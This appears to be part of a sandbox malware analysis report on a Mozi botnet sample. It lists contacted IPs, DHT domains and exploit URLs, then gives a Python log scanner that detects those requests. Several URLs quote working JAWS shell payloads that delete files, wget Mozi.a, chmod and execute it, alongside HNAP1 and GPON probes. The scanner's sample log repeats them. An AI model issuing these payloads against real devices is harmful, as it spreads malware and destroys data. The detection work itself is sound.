9105 TISCALI-UKTalkTalkCommunicationsLimitedGB false
35.121.101.202
unknown United States
237 MERIT-AS-14US false
94.117.20.210
unknown United Kingdom
41012 THECLOUDGB false
119.100.162.203
unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
202.146.185.28
unknown unknown
24536 ELNUS-AS-IDPTElektrindoDataNusantaraID false
222.121.68.4
unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
35.224.66.235
unknown United States
15169 GOOGLEUS false
121.192.9.176
unknown China
4538 ERX-CERNET-BKBChinaEducationandResearchNetworkCenter false
201.195.173.239
unknown Costa Rica
11830 InstitutoCostarricensedeElectricidadyTelecomCR false
155.228.130.68
unknown Switzerland
25021 CIEF-ASEtatdeFribourgSITelCH false
128.188.21.157
unknown United States
7645 DEAKIN-AS-APDeakinUniversityAU false
60.234.236.97
unknown New Zealand
9790 VOCUSGROUPNZVocusGroupNZ false
145.152.174.114
unknown Netherlands
1103 SURFNET-NLSURFnetTheNetherlandsNL false
138.94.203.237
unknown Brazil
264169 WSPPROGRESSOESERVDETELECOMUNICACAOLTDA-MEBR true
180.77.237.198
unknown China
17429 BGCTVNETBEIJINGGEHUACATVNETWORKCOLTDCN false
159.196.101.170
unknown Australia
4764 WIDEBAND-AS-APAussieBroadbandAU false
197.35.48.236
unknown Egypt
8452 TE-ASTE-ASEG false
175.158.80.139
unknown India
33480 WEBWERKSAS1US false

Contacted Domains

Name IP Active
dht.transmissionbt.com 212.129.33.59 true
bttracker.acc.umu.se 130.239.18.159 true
router.bittorrent.com 67.215.246.10 true
router.utorrent.com 82.221.103.244 true
bttracker.debian.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://127.0.0.1:80/GponForm/diag_Form?images/ true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://127.0.0.1:8080/GponForm/diag_Form?images/ false
  • Avira URL Cloud: safe
unknown
http://95.217.3.9:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
unknown
http://104.72.178.146:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
unknown
http://3.11.29.16:80/HNAP1/ true
  • Avira URL Cloud: safe
unknown
http://164.125.103.242:80/HNAP1/ false
  • Avira URL Cloud: safe
unknown
http://220.130.214.100:80/HNAP1/ true
  • Avira URL Cloud: safe
unknown
http://121.5.104.125:80/HNAP1/ true
  • Avira URL Cloud: safe
unknown
http://69.195.90.130:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
unknown
http://34.90.159.216:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws false
  • Avira URL Cloud: safe
unknown
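The contacted URLs are the sample's own outbound exploitation attempts against other hosts, so on a victim-side web server or router log they appear as inbound requests: the /shell?cd+/tmp;rm+-rf+*;wget+... query string carries a command chain that fetches and executes Mozi.a from an RFC 1918 address (the payload is served from inside the target's network rather than from a public host), /HNAP1/ is a probe for a HNAP management endpoint, and /GponForm/diag_Form?images/ targets a GPON router diagnostics form. None of these paths should appear in legitimate traffic to a general-purpose web server, which makes them cheap to alert on.

The following is an added log-scanning example written for this report, not code from Joe Sandbox or from the sample. It matches the three request-path patterns from the list above against combined-format access log lines, decoding the path first so percent- and plus-encoded variants of the same payload still hit, and counts matched requests per source address. The log lines are constructed for the example; only the request paths are taken from the report.

```python
import re
from urllib.parse import unquote_plus

# Request-path signatures derived from the "Contacted URLs" list above. They match the
# decoded path, so percent- and plus-encoded variants of the same payload still hit.
SIGNATURES = (
    ('jaws_shell_wget', re.compile(r'^/shell\?.*\bwget\b', re.I)),
    ('hnap1_probe',     re.compile(r'^/HNAP1/?(?:$|\?)', re.I)),
    ('gpon_diag_form',  re.compile(r'^/GponForm/diag_Form\?', re.I)),
)

# Combined log format as written by Apache and nginx.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed access-log lines (not from the report); the paths are the ones the report lists.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2021:10:00:01 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 162 "-" "-"
203.0.113.5 - - [10/Apr/2021:10:00:02 +0000] "GET /HNAP1/ HTTP/1.1" 404 162 "-" "-"
203.0.113.5 - - [10/Apr/2021:10:00:03 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 162 "-" "-"
198.51.100.7 - - [10/Apr/2021:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2021:10:00:05 +0000] "GET /shell?cd%20/tmp%3Bwget%20http%3A//192.168.1.1%3A8088/x HTTP/1.1" 404 162 "-" "-"
""".splitlines()

def classify_path(path):
    """Return the name of the first signature matching the decoded path, or None."""
    decoded = unquote_plus(path)
    for name, rx in SIGNATURES:
        if rx.search(decoded):
            return name
    return None

def scan_log(lines):
    """Return one hit per log line whose request path matches a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        sig = classify_path(m.group('path'))
        if sig:
            hits.append({
                'ip': m.group('ip'),
                'sig': sig,
                'path': m.group('path'),
                'status': int(m.group('status')),
                'ua_missing': m.group('ua') in ('', '-'),   # the report also flags requests with no User-Agent
            })
    return hits

def sources_by_hits(hits):
    """Count matched requests per source address, most active first."""
    counts = {}
    for h in hits:
        counts[h['ip']] = counts.get(h['ip'], 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))

if __name__ == '__main__':
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h['ip'], h['sig'], h['path'])
    print(sources_by_hits(found))
```

A source that trips more than one of these signatures within seconds, as in the constructed log, is almost certainly an infected node sweeping the address space; its address is worth blocking at the edge and, if it is inside your own network, worth the host sweep described earlier.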